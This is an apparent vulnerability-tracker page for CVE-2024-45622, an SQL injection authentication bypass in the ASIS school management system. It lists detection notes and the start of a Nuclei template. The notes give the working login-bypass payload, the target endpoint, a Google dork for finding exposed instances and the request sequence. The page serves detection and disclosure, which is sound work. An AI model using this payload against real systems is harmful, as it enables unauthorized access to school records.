CVE-2024-45622
published 2024-09-02CVE-2024-45622: ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
36.05%
98.3th percentile
ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
Detection & IOCsextracted from sources · hover to see the quote
- →Probe for the ASIS login panel by checking for the string 'ASIS | Aplikasi Sistem Sekolah' in the HTTP response body of GET /asispanel/ ↗
- →Exploitation attempt is a POST to /asispanel/login/cek with Content-Type application/x-www-form-urlencoded containing the SQL injection payload in the username field (' or 0=0 ##) ↗
- →Use the Google dork to identify exposed ASIS instances: "ASIS | Aplikasi Sistem Sekolah" ↗
- ·The vulnerability affects ASIS versions 3.0.0 through 3.2.0 only; versions beyond 3.2.0 are not confirmed vulnerable. ↗
- ·The exploit requires three sequential HTTP requests: first confirming the panel exists (HTTP 200 with fingerprint string), then sending the SQLi payload (expecting HTTP 303), then verifying access to /asispanel/home (HTTP 200 with 'Logout'). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
ASIS - SQL Injection Authentication Bypass
nuclei·CVSS 9.8
CVE-2024-45622 [CRITICAL] ASIS - SQL Injection Authentication Bypass
ASIS - SQL Injection Authentication Bypass
ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
Template:
id: CVE-2024-45622
info:
name: ASIS - SQL Injection Authentication Bypass
author: s4e-io
severity: critical
description: |
ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
impact: |
Unauthenticated attackers can bypass authentication via SQL injection to gain unauthorized access to the ASIS system.
remediation: |
Update ASIS to a version later than 3.2.0 that patches the SQL injection vulnerability.
reference:
- https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgni
No writeups or analysis indexed.
2024-09-02
Published